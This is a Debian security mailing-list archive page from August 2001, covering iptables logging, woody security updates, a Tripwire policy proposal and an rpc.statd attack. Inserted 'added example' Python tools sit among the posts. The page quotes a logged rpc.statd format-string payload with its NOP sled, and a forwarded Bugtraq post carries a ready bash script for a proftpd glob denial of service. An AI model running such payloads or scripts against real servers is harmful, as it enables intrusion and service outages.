Re: configuring iptables logging

2001-08-21 Thread Joerg Wendland

On Sat, Aug 18, 2001 at 04:59:28PM -0500, JonesMB wrote:
 Is it possible to get rid of the MAC address and the field that follows 
 it.  All I would like to see is the source and destination IP address and 
 the information after it.  I haven't been able to find any info on the net 
 on how to do this.  All I can think of is modifying the kernel (netfilter) 
 source file but that doesn't seem like a good idea.

Why don't you simply use

cut -f-4,6- -d' ' < logfile

? Sometimes the hardware address can be interesting.

Cheers, Joerg

-- 
  \ Joerg Wendland \ systems / network administrator, ITSec, Scan Plus GmbH
   \  *joergland*   \ Moerikestrasse 5, 89077 Ulm, Germany
\\ fon +49-731-92013-21, fax +49-731-6027146
 \\ PGP-key: finger [EMAIL PROTECTED]
  \ key fingerprint: 79C0 7671 AFC7 315E 657A  F318 57A3 7FBD 51CF 8417

 PGP signature
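An added example, not part of Joerg's reply or of anything else in this thread: a small Python filter that does the same job as the cut command above but selects the MAC field by its name rather than by its column. The sample log lines in it are constructed. The reason to prefer this is that the column number of MAC= is not fixed: a --log-prefix adds words in front of IN=, and packets logged from the OUTPUT chain (locally generated, no link-layer header yet) carry no MAC= field at all, so on those lines a fixed field list would throw away SRC= instead. The link_layer() helper also shows why the hardware address is worth keeping, as Joerg says: on Ethernet the MAC= value is the raw frame header (destination MAC, source MAC, EtherType), and the source MAC names the LAN host or router that actually emitted the frame, which a forged SRC= cannot hide.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample lines in the shape the kernel LOG target hands to
# syslog.  Line 1: inbound SYN on INPUT (has MAC=).  Line 2: a locally
# generated packet on OUTPUT (no MAC= at all).  Line 3: logged with
# --log-prefix, which shifts every later whitespace column by one.
SAMPLE_LINES = [
    "Aug 21 10:15:02 gw kernel: IN=eth0 OUT= "
    "MAC=00:50:56:c0:00:08:00:0c:29:3e:4f:aa:08:00 SRC=192.0.2.10 DST=198.51.100.5 "
    "LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=12345 DF PROTO=TCP SPT=34567 DPT=22 "
    "WINDOW=5840 RES=0x00 SYN URGP=0",
    "Aug 21 10:15:03 gw kernel: IN= OUT=eth0 SRC=198.51.100.5 DST=192.0.2.10 "
    "LEN=40 TOS=0x00 PREC=0x00 TTL=64 ID=0 DF PROTO=TCP SPT=22 DPT=34567 "
    "WINDOW=0 RES=0x00 ACK RST URGP=0",
    "Aug 21 10:15:04 gw kernel: DROPPED: IN=eth0 OUT= "
    "MAC=00:50:56:c0:00:08:00:0c:29:3e:4f:aa:08:00 SRC=192.0.2.77 DST=198.51.100.5 "
    "LEN=84 TOS=0x00 PREC=0x00 TTL=255 ID=1 PROTO=ICMP TYPE=8 CODE=0 ID=4242 SEQ=1",
]

_KERNEL_SPLIT = re.compile(r"^(?P<header>.*?kernel: )(?P<body>.*)$")
_KEYVAL = re.compile(r"^[A-Z]+=")


def parse_log_line(line: str) -> Tuple[str, str, Dict[str, str], List[str]]:
    """Split one LOG line into (syslog header, log prefix, KEY=value fields,
    bare flags such as DF/SYN/ACK).  Fields are found by name, never by
    column, so the presence or absence of MAC= does not matter."""
    m = _KERNEL_SPLIT.match(line)
    if not m:
        raise ValueError("not a kernel log line: %r" % line)
    tokens = m.group("body").split()
    i = 0
    while i < len(tokens) and not _KEYVAL.match(tokens[i]):
        i += 1                              # --log-prefix words come first
    prefix = " ".join(tokens[:i])
    fields: Dict[str, str] = {}
    flags: List[str] = []
    for tok in tokens[i:]:
        if "=" in tok:
            key, value = tok.split("=", 1)
            fields.setdefault(key, value)   # first ID= is the IP header's
        else:
            flags.append(tok)
    return m.group("header"), prefix, fields, flags


def link_layer(fields: Dict[str, str]) -> Optional[Dict[str, str]]:
    """MAC= is the raw link-layer header: for Ethernet that is destination
    MAC, source MAC and EtherType (14 bytes).  The source MAC is the LAN
    host or router that actually emitted the frame, whatever SRC= claims."""
    mac = fields.get("MAC")
    if not mac:
        return None
    octets = mac.split(":")
    if len(octets) != 14:
        return None                         # not Ethernet; do not guess
    return {"dst": ":".join(octets[0:6]),
            "src": ":".join(octets[6:12]),
            "ethertype": "".join(octets[12:14])}


def strip_mac(line: str) -> str:
    """The cut(1) equivalent done by name: drop the MAC= token wherever it
    sits and leave lines that never had one untouched."""
    return " ".join(t for t in line.split() if not t.startswith("MAC="))


if __name__ == "__main__":
    for line in SAMPLE_LINES:
        _, prefix, fields, flags = parse_log_line(line)
        print(strip_mac(line))
        print("   prefix=%r src=%s dst=%s proto=%s flags=%s link=%s" % (
            prefix, fields.get("SRC"), fields.get("DST"), fields.get("PROTO"),
            ",".join(flags), link_layer(fields)))
```

To use it as a filter, iterate over sys.stdin instead of SAMPLE_LINES; parse_log_line() raises on lines that are not kernel LOG output, so wrap the call if the file mixes in other syslog traffic.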


Re: apt sources.list

2001-08-21 Thread Mike Renfro

On Tue, Aug 21, 2001 at 09:36:02AM -0700, Jeff Coppock wrote:

Can I get a few recommendations on the proper sources.list for a
system running woody, that includes the security updates?

Woody would be my last choice for an automagically secure installation:

* it gets no packages of any kind that haven't been in unstable for 2
  weeks with no release-critical bugs. Security fixes are not an exception
  to this rule.

* most of the packages in security.debian.org have nearly identical
  versions to potato -- Debian tends not to upgrade versions to fix
  bugs, but instead backports patches into the current potato versions.
  This means that apt-get upgrade (or dist-upgrade) will tend to
  ignore security packages, since you'll already have a newer version
  installed. apt-get upgrade doesn't check dates, changelogs, or
  anything but the literal numeric version number.

Running stable+security.debian.org is really the only *easy* solution,
followed by running testing+(selected packages from unstable with
security updates and probably other changes, too), and lastly by
running fully unstable. Ok, those last two don't qualify as easy to me
at all.

For me, it's not even a question -- you want security, you run stable
and keep security.debian.org in your sources.list.

-- 
Mike Renfro  / R&D Engineer, Center for Manufacturing Research,
931 372-3601 / Tennessee Technological University -- [EMAIL PROTECTED]


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]




Re: apt sources.list

2001-08-21 Thread Jeff Coppock

Mike Renfro, 2001-Aug-21 14:40 -0500:
 On Tue, Aug 21, 2001 at 09:36:02AM -0700, Jeff Coppock wrote:
 
 Can I get a few recommendations on the proper sources.list for a
 system running woody, that includes the security updates?
 
 Woody would be my last choice for an automagically secure installation:
 
 * it gets no packages of any kind that haven't been in unstable for 2
   weeks with no release-critical bugs. Security fixes are not an exception
   to this rule.
 
 * most of the packages in security.debian.org have nearly identical
   versions to potato -- Debian tends not to upgrade versions to fix
   bugs, but instead backports patches into the current potato versions.
   This means that apt-get upgrade (or dist-upgrade) will tend to
   ignore security packages, since you'll already have a newer version
   installed. apt-get upgrade doesn't check dates, changelogs, or
   anything but the literal numeric version number.
 
 Running stable+security.debian.org is really the only *easy* solution,
 followed by running testing+(selected packages from unstable with
 security updates and probably other changes, too), and lastly by
 running fully unstable. Ok, those last two don't qualify as easy to me
 at all.
 
 For me, it's not even a question -- you want security, you run stable
 and keep security.debian.org in your sources.list.
 
 -- 
 Mike Renfro  / R&D Engineer, Center for Manufacturing Research,
 931 372-3601 / Tennessee Technological University -- [EMAIL PROTECTED]
 
 
 

   Thanks for this explanation.  I see what you mean, if I want
   security updates.  
   
   I feel a bit stuck with woody though, since I want to use
   iptables instead of ipchains.  I think I'll remove the
   security source until I figure out a better way.
   
   thanks,
   jc

-- 

Jeff Coppock        Nortel Networks
Systems Engineer    http://nortelnetworks.com
Major Accts.        Santa Clara, CA






Re: rpc.statd being attacked?

2001-08-21 Thread kath

I think this is an 800 year old Red Hat exploit, so probably no worries.

No need to worry, but any rpc services are lousy to have running anyway.

- k

- Original Message -
From: Daniel Schepler [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Tuesday, August 21, 2001 4:28 PM
Subject: rpc.statd being attacked?


 I've gotten logs several times that read something like

 Aug 20 19:20:24 adsl-63-193-247-253 rpc.statd[330]: gethostbyname error for ^X
 <F7><FF><BF>^X<F7><FF><BF>^Y<F7><FF><BF>^Y<F7><FF><BF>^Z<F7><FF><BF>^Z<F7><FF>
 <BF>^[<F7><FF><BF>^[<F7><FF><BF>%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%
 192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220

 (This is at least the way it reads in less.)  For now I've just shut
 down the rpc.statd daemon, but I was wondering if this is a known
 attack.
 --
 Daniel Schepler              Please don't disillusion me.  I
 [EMAIL PROTECTED]            haven't had breakfast yet.
                                  -- Orson Scott Card









Re: rpc.statd being attacked?

2001-08-21 Thread Daniel Jacobowitz

On Tue, Aug 21, 2001 at 01:28:24PM -0700, Daniel Schepler wrote:
 I've gotten logs several times that read something like
 
 Aug 20 19:20:24 adsl-63-193-247-253 rpc.statd[330]: gethostbyname error for ^X
 <F7><FF><BF>^X<F7><FF><BF>^Y<F7><FF><BF>^Y<F7><FF><BF>^Z<F7><FF><BF>^Z<F7><FF>
 <BF>^[<F7><FF><BF>^[<F7><FF><BF>%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%

You're safe.  It was fixed before potato; it would not have been logged
if it had succeeded.

-- 
Daniel Jacobowitz   Carnegie Mellon University
MontaVista Software Debian GNU/Linux Developer






Re: apt sources.list

2001-08-21 Thread Daniel Jacobowitz

On Tue, Aug 21, 2001 at 09:36:02AM -0700, Jeff Coppock wrote:
Can I get a few recommendations on the proper sources.list for
a system running woody, that includes the security updates?  I
recently did an apt-get update && apt-get upgrade and the
security updates cause dependency issues that I couldn't
recover from and made my system unbootable, since lilo was
involved.  I'm scared to death to run another update/upgrade
since I had to rebuild the system from scratch!

As others have said - don't do this :)

If security is especially important to you, run stable with security
updates, or track unstable daily and hope maintainers are responsive. 
We try to see that woody is in coherent shape just before release, but
we can't supply fixes for it on any more urgent basis.  It moves too
fast.

-- 
Daniel Jacobowitz   Carnegie Mellon University
MontaVista Software Debian GNU/Linux Developer







FHS + Debian Tripwire policy file

2001-08-21 Thread Erik Rossen
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

I am in the process of designing a Tripwire 2.3 policy file that is based
on the FHS plus annexes for GNU/Linux and Debian's distribution of it.  I
don't like the current policy file which is just a list of all of the
Debian Important-level package files - it complains too much about
missing files when one does not have a standard setup and it is really
too detailed (= long to read) in the wrong places.  In addition, it does
not check some Debian-specific stuff like the contents of /var/lib/dpkg.

My goal is that the system will be sufficiently modular that one can just
patch in a few tiny distribution-specific changes and have a nice policy
for any FHS-compliant system.  I am trying to limit references to
individual files to the absolute minimum and instead address whole
directories at a time.  Hopefully, this will result in a shorter, yet more
thorough policy that never causes a complaint except when there has been a
real unauthorised change.

Eventually I also plan to write a script that will automatically check off
files that have been changed by dpkg and reported by Tripwire, perhaps
using md5sum info from the .debs.

Before I get too far, I would like to ask the question: is anyone
working on a similar project?  Perhaps for aide or another IDS?  I've done
some Google searches for FHS and Tripwire, but except for a few off-hand
remarks, it seems that no one is working on this idea.


Erik Rossen ^GPG key ID: 2935D0B9
[EMAIL PROTECTED] /e\   Use GnuPG, see the
http://www.multimania.com/rossen   ---black helicopters.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE7gi+jY88aPik10LkRAiBEAKDVJJ28JRs9vU+d/LQKMyFru4dRCACdFcyR
muveSPk58ya0khe4tPpr6UI=
=Dx2o
-END PGP SIGNATURE-
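An added example of the check-off script Erik describes, written for this page rather than taken from his work or from Tripwire: it reads the manifest format dpkg keeps in /var/lib/dpkg/info/<package>.md5sums (one "<md5hex>  <path relative to />" line per shipped file) and sorts a Tripwire change list into files whose current content is exactly what a package shipped, which a dpkg upgrade explains, and everything else. The package, file names and contents in build_demo() are constructed. Two caveats the policy should reflect: the manifests live under /var/lib/dpkg, the directory Erik already wants covered, because whoever can replace a binary can rewrite its md5sums line too; and a conffile the admin edited is reported as unexplained by design, since dpkg's manifest only knows the shipped version. MD5 is no longer collision-resistant either, so a match means "dpkg could have put this here", not proof of origin.

```python
import hashlib
import os
import shutil
import tempfile
from typing import Dict, Iterable, List, Tuple


def parse_md5sums(text: str) -> Dict[str, str]:
    """Parse dpkg's <package>.md5sums format: '<md5hex>  <path>' per line,
    the path relative to / (no leading slash).  Returned keys are absolute."""
    manifest: Dict[str, str] = {}
    for line in text.splitlines():
        parts = line.split(None, 1)
        if len(parts) == 2:
            manifest["/" + parts[1].strip()] = parts[0].lower()
    return manifest


def file_md5(path: str) -> str:
    h = hashlib.md5()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def triage(root: str, manifest: Dict[str, str],
           reported: Iterable[str]) -> Tuple[List[str], List[str]]:
    """Sort paths Tripwire reported as changed into 'explained' (the file is
    byte-for-byte what the installed package manifest says dpkg put there)
    and 'unexplained' (not shipped by any package, missing, or not what
    dpkg put there).  `root` lets the demo run against a fake filesystem;
    use "/" on a real host."""
    explained, unexplained = [], []
    for path in reported:
        expected = manifest.get(path)
        real = os.path.join(root, path.lstrip("/"))
        if expected is not None and os.path.isfile(real) and file_md5(real) == expected:
            explained.append(path)
        else:
            unexplained.append(path)
    return explained, unexplained


def build_demo() -> Tuple[str, str, List[str]]:
    """Constructed scenario (not a real package): a package upgrade wrote
    /usr/sbin/demod and /etc/demod.conf, someone then replaced
    /usr/sbin/demod-helper, and /usr/local/bin/x belongs to no package.
    Returns (fake root, md5sums text, Tripwire's list of changed files)."""
    root = tempfile.mkdtemp(prefix="twdemo-")
    shipped = {
        "usr/sbin/demod": b"#!/bin/sh\necho demod 1.1\n",
        "usr/sbin/demod-helper": b"#!/bin/sh\necho helper 1.1\n",
        "etc/demod.conf": b"listen 127.0.0.1\n",
    }
    manifest_lines = []
    for rel, content in shipped.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(content)
        manifest_lines.append("%s  %s" % (hashlib.md5(content).hexdigest(), rel))
    # tampering after the upgrade: same path, different bytes
    with open(os.path.join(root, "usr/sbin/demod-helper"), "wb") as fh:
        fh.write(b"#!/bin/sh\n# not what the package shipped\n")
    os.makedirs(os.path.join(root, "usr/local/bin"))
    with open(os.path.join(root, "usr/local/bin/x"), "wb") as fh:
        fh.write(b"#!/bin/sh\n")
    reported = ["/usr/sbin/demod", "/usr/sbin/demod-helper",
                "/etc/demod.conf", "/usr/local/bin/x"]
    return root, "\n".join(manifest_lines) + "\n", reported


def cleanup(root: str) -> None:
    shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    root, text, reported = build_demo()
    try:
        explained, unexplained = triage(root, parse_md5sums(text), reported)
        print("explained by a package upgrade:", explained)
        print("needs a human:", unexplained)
    finally:
        cleanup(root)
```

On a real host, feed it the concatenation of every /var/lib/dpkg/info/*.md5sums and the path column of the Tripwire report; anything that lands in the unexplained list is what the policy was written to find.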




apt sources.list

2001-08-21 Thread Jeff Coppock
   Can I get a few recommendations on the proper sources.list for
   a system running woody, that includes the security updates?  I
   recently did an apt-get update && apt-get upgrade and the
   security updates cause dependency issues that I couldn't
   recover from and made my system unbootable, since lilo was
   involved.  I'm scared to death to run another update/upgrade
   since I had to rebuild the system from scratch!
   
   thanks,
   jc
   
-- 

Jeff Coppock        Nortel Networks
Systems Engineer    http://nortelnetworks.com
Major Accts.        Santa Clara, CA



Re: apt sources.list

2001-08-21 Thread Stig Brautaset
* Jeff Coppock [EMAIL PROTECTED] spake thus:
Can I get a few recommendations on the proper sources.list for
a system running woody, that includes the security updates?  I
recently did an apt-get update && apt-get upgrade and the
security updates cause dependency issues that I couldn't
recover from and made my system unbootable, since lilo was
involved.  I'm scared to death to run another update/upgrade
since I had to rebuild the system from scratch!

I think that running dist-upgrade instead of merely upgrade will be a
good idea with woody/sid. I am not sure whether that may have caused your
trouble, however; there are probably more knowledgeable people on the list
who can answer that.


Regards, Stig
-- 
www.brautaset.org




rpc.statd being attacked?

2001-08-21 Thread Daniel Schepler
I've gotten logs several times that read something like

Aug 20 19:20:24 adsl-63-193-247-253 rpc.statd[330]: gethostbyname error for ^X
<F7><FF><BF>^X<F7><FF><BF>^Y<F7><FF><BF>^Y<F7><FF><BF>^Z<F7><FF><BF>^Z<F7><FF>
<BF>^[<F7><FF><BF>^[<F7><FF><BF>%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%
192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220

(This is at least the way it reads in less.)  For now I've just shut
down the rpc.statd daemon, but I was wondering if this is a known
attack.
-- 
Daniel Schepler              Please don't disillusion me.  I
[EMAIL PROTECTED]            haven't had breakfast yet.
                                 -- Orson Scott Card
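An added example, not from the thread: a Python triage routine for lines like the one above. Reading the posted line takes two decodings first. sysklogd writes bytes below 0x20 as caret pairs (^X is 0x18) and bytes 0x80-0x9f as octal (\220 is 0x90, the x86 NOP); less shows the remaining high bytes as <F7>, and this archive has dropped those angle brackets, so the posted ^XF7FFBF was ^X<F7><FF><BF>. Decoded, the string starts with the 4-byte little-endian addresses 0xbffff718, 0xbffff719, 0xbffff71a and 0xbffff71b, each twice, which lie at the top of user space on a 2.x x86 kernel. The nine %8x pop stack words until the format-string argument pointer reaches those addresses; each %n then writes the running count of output characters through the next one, and the %236x/%137x/%10x/%192x widths set that count so the low byte of each write assembles one byte of the attacker's chosen pointer. The \220 run is the NOP sled in front of the shellcode. The sample in the code is the posted line with the sled shortened and the brackets restored; the benign line is constructed. As Daniel Jacobowitz says, the fact that the line was logged at all is the sign the attack failed: a fixed statd hands the hostname to syslog as a %s argument, so the %n was never interpreted.

```python
import re
from typing import Dict, List

# The posted line with the sled shortened to 40 bytes and less's <..>
# brackets restored.  sysklogd renders bytes < 0x20 as ^X pairs and
# 0x80-0x9f as \ooo octal; less renders the other high bytes as <F7>.
SAMPLE = (
    "Aug 20 19:20:24 adsl-63-193-247-253 rpc.statd[330]: gethostbyname error for "
    "^X<F7><FF><BF>^X<F7><FF><BF>^Y<F7><FF><BF>^Y<F7><FF><BF>"
    "^Z<F7><FF><BF>^Z<F7><FF><BF>^[<F7><FF><BF>^[<F7><FF><BF>"
    "%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n" + "\\220" * 40
)
# A constructed, harmless lookup failure for comparison.
BENIGN = ("Aug 20 19:21:00 adsl-63-193-247-253 rpc.statd[330]: "
          "gethostbyname error for nosuchhost.example")

_ESCAPE = re.compile(r"\^(.)|\\([0-7]{3})|<([0-9A-Fa-f]{2})>|(.)", re.DOTALL)
STACK_LOW, STACK_HIGH = 0xBFF00000, 0xC0000000   # top of user space, x86 Linux 2.x


def decode_logged_bytes(text: str) -> bytes:
    """Undo the syslogd and less escaping to get the bytes statd received.
    A literal '^', '\\' or '<' in a real hostname would be mis-decoded:
    this reads a viewer's rendering, it is not a general log parser."""
    out = bytearray()
    for caret, octal, hexpair, plain in _ESCAPE.findall(text):
        if caret:
            out.append(ord(caret) ^ 0x40)        # ^X -> 0x18
        elif octal:
            out.append(int(octal, 8))            # \220 -> 0x90
        elif hexpair:
            out.append(int(hexpair, 16))         # <F7> -> 0xf7
        else:
            out.extend(plain.encode("latin-1", "replace"))
    return bytes(out)


def find_stack_addresses(data: bytes) -> List[int]:
    """Every 4-byte little-endian value, at any offset, inside the stack range."""
    return [v for v in (int.from_bytes(data[i:i + 4], "little")
                        for i in range(len(data) - 3))
            if STACK_LOW <= v < STACK_HIGH]


def longest_run(data: bytes, byte: int) -> int:
    best = cur = 0
    for b in data:
        cur = cur + 1 if b == byte else 0
        best = max(best, cur)
    return best


def analyse_line(line: str) -> Dict[str, object]:
    """Three indicators: %n directives (the write primitive), pointers into
    the stack for them to write through, and a NOP sled (0x90) to land in."""
    data = decode_logged_bytes(line)
    addrs = find_stack_addresses(data)
    writes = data.count(b"%n")
    sled = longest_run(data, 0x90)
    return {
        "percent_n": writes,
        "stack_addresses": addrs,
        "nop_sled": sled,
        # %n with something to aim it at is the signature; a sled alone is not
        "suspicious": writes > 0 and (len(addrs) > 0 or sled >= 16),
    }


if __name__ == "__main__":
    for line in (SAMPLE, BENIGN):
        r = analyse_line(line)
        print("%-7s %%n=%d sled=%d targets=%s" % (
            "ATTACK" if r["suspicious"] else "ok", r["percent_n"], r["nop_sled"],
            ["0x%08x" % a for a in r["stack_addresses"]]))
```

The %n count is the indicator to alert on: a hostname has no business containing it, whereas high bytes alone turn up in ordinary garbage. The address range is spec-ific to 2.x x86 kernels without stack randomisation; on anything newer the sled and the %n directives still hold, the fixed range does not.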



Re: apt sources.list

2001-08-21 Thread Hubert Chan
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 Jeff == Jeff Coppock [EMAIL PROTECTED] writes:

Jeff> I feel a bit stuck with woody though, since I want to use
Jeff> iptables instead of ipchains.  I think I'll remove the security
Jeff> source until I figure out a better way.

Adrian Bunk has all that you need for kernel 2.4.x on Potato (including
iptables):
http://people.debian.org/~bunk/debian/dists/potato/main/binary-i386/

- -- 
Hubert Chan [EMAIL PROTECTED] - http://www.geocities.com/hubertchan/
PGP/GnuPG key: 1024D/651854DF71FDA37F
Fingerprint: 6CC5 822D 2E55 494C 81DD  6F2C 6518 54DF 71FD A37F
Key available at wwwkeys.pgp.net.   Please encrypt *all* e-mail to me.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE7gsjiZRhU33H9o38RAjeKAKC8L8mOFBJ/QzKG/iMUpHJr5M4HLwCg05EI
hjb88wvLOLp4O9eObhX+uV4=
=pBxt
-END PGP SIGNATURE-



Re: apt sources.list

2001-08-21 Thread Eric N. Valor

At 01:24 PM 8/21/2001 -0700, Jeff Coppock wrote:

Mike Renfro, 2001-Aug-21 14:40 -0500:
 On Tue, Aug 21, 2001 at 09:36:02AM -0700, Jeff Coppock wrote:

 Can I get a few recommendations on the proper sources.list for a
 system running woody, that includes the security updates?

 Woody would be my last choice for an automagically secure installation:

   Thanks for this explanation.  I see what you mean, if I want
   security updates.

   I feel a bit stuck with woody though, since I want to use
   iptables instead of ipchains.  I think I'll remove the
   security source until I figure out a better way.


If you want to use IPTables, simply upgrade your kernel.  ftp.kernel.org 
and schlurp down the linux-v2.4.x of your choice (I'm using 2.4.6 right 
now).  Then apt-get install iptables and you're set.




--
Eric N. Valor
Webmeister/Inetservices
Lutris Technologies
[EMAIL PROTECTED]

- This Space Intentionally Left Blank -



Re: apt sources.list

2001-08-21 Thread Steven James
Greetings,

A better solution might be to install Potato, then recompile the src debs from 
woody for the few packages that you actually need.

G'day,
sjames


Quoting Jeff Coppock [EMAIL PROTECTED]:

 Mike Renfro, 2001-Aug-21 14:40 -0500:
  On Tue, Aug 21, 2001 at 09:36:02AM -0700, Jeff Coppock wrote:
  
  Can I get a few recommendations on the proper sources.list for a
  system running woody, that includes the security updates?
  
  Woody would be my last choice for an automagically secure
 installation:
  
  * it gets no packages of any kind that haven't been in unstable for
 2
weeks with no release-critical bugs. Security fixes are not an
 exception
to this rule.
  
  * most of the packages in security.debian.org have nearly identical
versions to potato -- Debian tends not to upgrade versions to fix
bugs, but instead backports patches into the current potato
 versions.
This means that apt-get upgrade (or dist-upgrade) will tend to
ignore security packages, since you'll already have a newer version
installed. apt-get upgrade doesn't check dates, changelogs, or
anything but the literal numeric version number.
  
  Running stable+security.debian.org is really the only *easy*
 solution,
  followed by running testing+(selected packages from unstable with
  security updates and probably other changes, too), and lastly by
  running fully unstable. Ok, those last two don't qualify as easy to
 me
  at all.
  
  For me, it's not even a question -- you want security, you run stable
  and keep security.debian.org in your sources.list.
  
  -- 
  Mike Renfro  / R&D Engineer, Center for Manufacturing Research,
  931 372-3601 / Tennessee Technological University --
 [EMAIL PROTECTED]
  
  
  
 
Thanks for this explanation.  I see what you mean, if I want
security updates.  

I feel a bit stuck with woody though, since I want to use
iptables instead of ipchains.  I think I'll remove the
security source until I figure out a better way.

thanks,
jc
 
 -- 
 
 Jeff Coppock  Nortel Networks
 Systems Engineer  http://nortelnetworks.com
 Major Accts.  Santa Clara, CA
 
 
 



-steven james, director of research, linux labs
LinuxBIOS Cluster Solutions 230 peachtree st nw ste 701
High-Speed Colocation, Hosting, atlanta.ga.us 30303
Web Design, Linux Hardware,http://www.linuxlabs.com
Development & Support Since 1995  404.577.7747 fax 404.577.7743
---




Fwd: [bugtraq@securityfocus.com] Multiple-Vendor-FTP-Vuln. (old?)

2001-08-21 Thread A . Didit Mifanto
I'm using proftpd 1.2.0pre10-2.0potato1, tried this vulnerability, and it
still affects this version of proftpd.
I see that ftp://ftp.debian.org is still using this version, and I think it
is also affected.

Thanks

Didit




--- Start of forwarded message ---
From: Enrico Kern [EMAIL PROTECTED]
To: bugtraq@securityfocus.com
Organization: http://freemail.web.de/
Subject: Multiple-Vendor-FTP-Vuln. (old?)
Date: 8/20/01 20:20:35

Hi,

I tested an old proftpd bug (ls /../*/../*/../*/../*/../*/../*/../*) on
many new Linux distributions. When a user logs in via ftp and types the
ls command, in.ftpd takes over 90 percent CPU usage; execute the command
2 or 3 times and the whole system hangs up. It also works on the console.
I wonder why that is not fixed. THIS BUG IS OLD, POSTED ON BUGTRAQ in
March 01, but it still works so I post it again.

affected:

RedHat Linux 7.x
Linux Mandrake 8.0
SuSE Linux 7.2
FreeBSD 4.3
AiX V 4.3
other?


Not vuln.:

latest Wu-Ftpd
Windows FTP-Server


Exploit:

#!/bin/bash
# anonymous login, then the pathological listing
# ("quot" is the ftp client's quote command, abbreviated)
ftp -n FTP-SERVER <<\end
quot user anonymous
bin
quot pass [EMAIL PROTECTED]
ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
bye
end

Fix:

set cpu-limit for your anonymous user.

--- End of forwarded message ---
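The forwarded post says the listing pins the CPU but not why, so here is an added Python demonstration of the mechanism (my code, not the exploit above, and it needs no FTP server). Each /../* in the pattern climbs back to the directory it came from and fans out over all of its entries again, so the number of candidate pathnames the daemon's glob(3) has to build and stat grows as entries to the power of the number of stars: the posted pattern has thirteen stars, and a typical / has around twenty entries. The demo builds a throwaway tree (constructed, removed afterwards) and counts the matches Python's glob produces as the number of stars rises.

```python
import glob
import os
import shutil
import tempfile
from typing import List


def build_tree(entries: int) -> str:
    """Throwaway directory holding `entries` subdirectories d0..dN-1."""
    root = tempfile.mkdtemp(prefix="ftpglob-")
    for i in range(entries):
        os.mkdir(os.path.join(root, "d%d" % i))
    return root


def bounce_pattern(root: str, stars: int) -> str:
    """root/d0/../*/../*/...: every '/../*' climbs back to root and fans
    out over each entry again, so the candidates multiply per star."""
    return os.path.join(root, "d0") + "/../*" * stars


def count_matches(root: str, stars: int) -> int:
    """What a glob(3)-style expansion of the pattern has to enumerate."""
    return len(glob.glob(bounce_pattern(root, stars)))


def expected_matches(entries: int, stars: int) -> int:
    return entries ** stars


def demo(entries: int = 4, max_stars: int = 3) -> List[int]:
    """Match counts for 1..max_stars stars; the tree is removed afterwards."""
    root = build_tree(entries)
    try:
        return [count_matches(root, s) for s in range(1, max_stars + 1)]
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for stars, n in enumerate(demo(), start=1):
        print("%d star(s): %d paths" % (stars, n))
    # the posted pattern against a / with about twenty entries
    print("posted pattern, 13 stars, 20 entries: %d candidates"
          % expected_matches(20, 13))
```

The "set cpu-limit" fix in the post (RLIMIT_CPU, for instance ulimit -t in the ftpd start-up script or a PAM limit for the anonymous account) only bounds how long one session can burn a core before it is killed; the durable fix is a server-side limit on glob expansion depth, which I assume is what makes the latest wu-ftpd immune as the post reports.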




